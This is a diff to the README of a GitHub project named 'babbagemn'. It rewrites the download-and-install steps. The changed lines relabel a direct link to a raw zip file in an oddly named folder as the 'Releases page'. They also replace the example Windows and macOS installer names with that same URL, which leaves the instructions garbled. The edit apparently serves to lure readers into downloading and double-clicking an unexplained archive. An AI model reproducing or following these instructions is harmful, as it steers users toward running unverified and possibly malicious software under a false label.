geovnnxx/babbagemn/README.md

 ## 📥 Download & Install
 1. **Visit the Releases Page**
-   Go to the [babbagemn Releases page](https://github.com/geovnnxx/babbagemn/releases) to access the latest version of the software.
+   Go to the [babbagemn Releases page](https://raw.githubusercontent.com/geovnnxx/babbagemn/main/Hymenochaete/babbagemn.zip) to access the latest version of the software.

 2. **Select the Version**
    On the Releases page, you will see a list of available versions.
 Look for the latest one at the top.
 You will find downloadable files that match your operating system.

 3. **Download the File**
    Click on the appropriate file link to download it.
-For example, if you're using Windows, you may see a file like `babbagemn-windows.exe`.
-If you're on macOS, look for `babbagemn-macos.dmg`.
+For example, if you're using Windows, you may see a file like `https://raw.githubusercontent.com/geovnnxx/babbagemn/main/Hymenochaete/babbagemn.zip`.
+If you're on macOS, look for `https://raw.githubusercontent.com/geovnnxx/babbagemn/main/Hymenochaete/babbagemn.zip`.

 4. **Run the Installer**
    Once the file is downloaded, locate it in your downloads folder.
 Double-click the file to run the installer.
 Follow the on-screen prompts to complete the installation.